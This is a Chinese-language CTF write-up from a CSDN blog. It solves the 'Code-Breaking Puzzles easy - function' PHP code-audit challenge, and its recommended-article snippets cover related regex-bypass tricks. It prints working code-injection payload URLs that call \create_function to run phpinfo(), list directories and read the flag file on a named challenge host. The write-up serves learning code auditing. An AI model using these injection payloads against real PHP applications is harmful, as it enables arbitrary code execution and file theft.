Code-Breaking Puzzles easy - function(匿名函数利用)

最新推荐文章于 2023-11-15 14:25:47 发布
最新推荐文章于 2023-11-15 14:25:47 发布
阅读量915 收藏 1
点赞数 1
分类专栏: # ——【 Command Execute】 ★ PHP # ——【 Code Audit】 ★ CTF 文章标签: 代码审计 create_function()
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dyw_666666/article/details/90047968
版权

题目地址:http://120.78.164.84:49001/

<?php
$action = $_GET['action'] ?? '';
$arg = $_GET['arg'] ?? '';

if(preg_match('/^[a-z0-9_]*$/isD', $action)) {
    show_source(__FILE__);
} else {
    $action('', $arg);
}

我们来审计下这个代码:

1,看到 $action('',$arg) 这里有两个参数,可以想到create_function()匿名函数代码注入。

2,这里还有一个正则需要绕过,不过这个正则很容易知道只要我们在开头或者结尾加入其他字符就可以绕过了。至于是什么字符,用bp来fuzz一波就可以知道是%5c。

http://120.78.164.84:49001/?action=%5ccreate_function&arg=2;}phpinfo();/*

3,实际上不用%5c,加一个 \ 也能执行,这里涉及到了php的全局命名空间,\create_function就是调用全局的create_function函数。

https://blog.csdn.net/dyw_666666/article/details/90042852

看一下手册中的例子就大概知道是什么意思了。

http://120.78.164.84:49001/?action=\create_function&arg=2;}phpinfo();/*

最终Payload:

http://120.78.164.84:49001/?action=\create_function&arg=2;}print_r(scandir(%27../%27));/*
http://120.78.164.84:49001/?action=\create_function&arg=2;}print_r(file_get_contents(%27../flag_h0w2execute_arb1trary_c0de%27));/*

烟敛寒林o
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
代码审计Code-Breaking Puzzles学习记录
酉酉的博客
12-12 894
文章目录前言easy - functionpayloadeasy - pcrewafpayloadeasy - phpmagicpayloadeasy - phplimitpayload 前言 Code-Breaking Puzzles是一场完全开放源代码的Web解密游戏,其包含但不限于PHP、Java、Node.js、Python等语言的代码审计知识。 p师傅的知识星球真是干货多多,刚刚加入就...
Code-Breaking Puzzles 做题记录
fnmsd的博客
11-28 3678
Code-Breaking Puzzles Writeup 代码审计圈子里看到Code-Breaking Puzzles,跟着学习着做下。 地址:https://code-breaking.com/ 给P神的代码审计圈子打个广告,199元你买不了吃亏买不了上当: easy - pcrewaf 这个题最开始做上来的,但是做出来了个非预期解。 最开始的题目: &amp;amp;amp;amp;amp;lt;?php function is...
Easy Function题解——大数的大小比较(log函数取对数)
道阻且长,行则将至
04-12 3460
Input Input contains multiple test cases. One line one case, and each case is three integers, a, b, c. We guarantee that 1 ≤ a, b, c ≤ 20000.(题意:比较a!和b^c的大小,相等则输出0,后者大则输出-1,前者大则输出1) Output For each ca...
代码审计学习.CodeBreaking.easy-function
最新发布
qq_20643933的博客
11-15 112
代码审计学习.Code-Breaking Puzzles.easy-function
[$a(”,$b);]Code-Breaking Puzzles easyfunction匿名函数利用)文章转自:烟敛寒林o...
Landasika的博客
05-17 125
[$a('',$b);]Code-Breaking Puzzles easy - function(匿名函数利用) 文章转自:烟敛寒林o的博客https://blog.csdn.net/dyw_666666/article/details/90047968 题目地址:http://120.78.164.84:49001/(链接好像失效了) 我们来审计下这个代码: 1,看到 $action('...
code-puzzles:编程挑战与算法
04-07
在"code-puzzles-main"这个压缩包文件中,我们可以期待找到一个主目录,其中包含各个编程挑战的子目录或文件。每个挑战可能包含一个问题描述、预期的输入/输出示例以及可能的解决方案。通过解决这些挑战,学习者可以...
行业教育软件-学习软件-Animated Puzzles2 1.0 英文版.zip
08-01
《 Animated Puzzles2 1.0 英文版:一款创新的行业教育与学习工具》 在数字化时代,教育软件已经成为辅助学习、提升教学效果的重要工具。"Animated Puzzles2 1.0 英文版"就是这样一款专为行业教育和学习设计的软件...
行业教育软件-学习软件-Animated Puzzles3 1.0 英文版.zip
08-01
总的来说,"Animated Puzzles3 1.0 英文版"是一款集趣味性、互动性和教育性于一体的软件,它巧妙地利用游戏化学习策略,将学习过程变得充满乐趣,同时不失教育价值。无论是在学校、家庭还是职场,它都能成为提升学习...
100-pandas-puzzles:大熊猫的100个数据难题,范围从简短到简单到超级棘手(完成60%)
04-13
由于pandas是一个大型图书馆,具有许多不同的专家特征和功能,因此这些练习主要集中在利用核心DataFrame和Series对象来处理数据(索引,分组,聚合,清理)的基础上。 这里的许多练习很简单,因为解决方案只需要...
Code-Breaking 2018 Thejs(代码审计
qq_53460654的博客
02-06 1414
由于没找到环境,我这里只是为了学习这个知识点,所以找源码来分析一下 源码:https://github.com/phith0n/code-breaking/tree/master/2018/thejs const fs = require('fs') const express = require('express') const bodyParser = require('body-parser') const lodash = require('lodash') const session = requ
name-all-the-things:节点需要挂钩以将名称放在匿名函数
05-20
命名所有事物 在Node.js中,在许多情况下,使用匿名函数对调试目的无济于事。 命名所有事物( name-all-the-things )是一个Node.js require挂钩,该挂钩可扫描所有已加载的模块,并为其找到的任何功能插入名称。 函数名称的含义是合理的。 // Putting a name on unnamed functions that initialize vars is easy var foo = function ( ) { } ; // becomes var foo = function anon$foo() {}; // Initializing fields is also easy { bar : function ( ) { } // becomes bar: function anon$bar() {} } // Anonymous f
正则绕过总结
qq_40327508的博客
09-28 7864
换行符绕过(%0a) <?php include("flag.php"); highlight_file(__FILE__); $c = $_GET['c']; if (preg_match('/^flag$/i', $c) && $c !== 'flag') { echo $flag; }else{ echo "nonono"; } 2.数组绕过 preg_match只能处理字符串,当传入的subject是数组时会返回false 3.%5c绕过 <?ph.
代码审计从入门到放弃(一) & function
蚁景网安学院
03-07 526
前言题目概述漏洞点思考字符fuzzgetshell函数寻找getflag相关实验操作小结 前言CodeBreaking是ph牛搭建的代码审计挑战赛:https://code-...
php 命名空间 create_function,PHP create_function()注入命令执行漏洞
weixin_39716044的博客
03-21 415
0x00 create_function()介绍create_function()创建匿名函数string create_function ( string $args , string $code )stringcode 方法代码部分举例:create_function('$name','echo $name."A"')类似于:function name($name) {echo ...
[NISACTF 2022]level-up的level5的wp
weixin_45446164的博客
07-17 176
然后$a在else里面可以使用create_function来创建一个匿名函数,在b使用vardump来打印变量中的详情信息,在vardump使用scandir函数来扫描目录然后使用/*来注释掉后面的代码最后的payload。接下来在更改scandir为file_get_contents()读取文件的内容并返回其内容作为字符串 读取根目录的flag。这个表示首字符(^ 表示匹配字符串的起始位置。)不能用a-z或者下划线,所以使用\来绕过。这道题看了很久没看通,最后看别的师傅的wp感觉打开了新思路。
php action function,代码审计从入门到放弃(一) & function
weixin_39557813的博客
03-11 161
原标题:代码审计从入门到放弃(一) & function前言题目概述漏洞点思考字符fuzzgetshell函数寻找getflag相关实验操作小结前言CodeBreaking是ph牛搭建的代码审计挑战赛:https://code-breaking.com刚发布的时候一直忙于学业和一些琐事,没法认真研究和学习,最近闲下来了,于是打算填下这个坑~题目ph牛均已开源至github:https://...
CodeBreaking题目复现
stepone4ward的博客
01-15 615
感谢郁师傅搭建的环境
Buuoj刷题记录
meteox的博客
08-09 5884
--- title: Buuoj刷题记录 date: 2020-07-20 11:07:42 tags: 题解 categories: ctf img: https://img.buuoj.cn/buugirl/img/1.png 记录buuoj写过的题 web [HCTF 2018]WarmUp F12看到存在source.php,跳转后看到代码 <?php highlight_file(__FILE__); class emmm { publ
Code-Breaking Puzzles做题记录
XL115715453的博客
12-27 301
文章首发于先知社区:https://xz.aliyun.com/t/3623 Code-Breaking Puzzles传送门:https://code-breaking.com function PHP函数利用技巧 pcrewaf PHP正则特性 phpmagic PHP写文件技巧 phplimit PHP代码执行限制绕过 nodechr Javascript字符串...
深入C++:40个工程难题与编程挑战
"More Exceptional C++: 40 New Engineering Puzzles, Programming Problems, and Solutions" 本书《More Exceptional C++》是C++深入研究系列丛书中的一本,主要面向已经有一定C++基础的程序员,旨在通过40个新的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烟敛寒林o

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值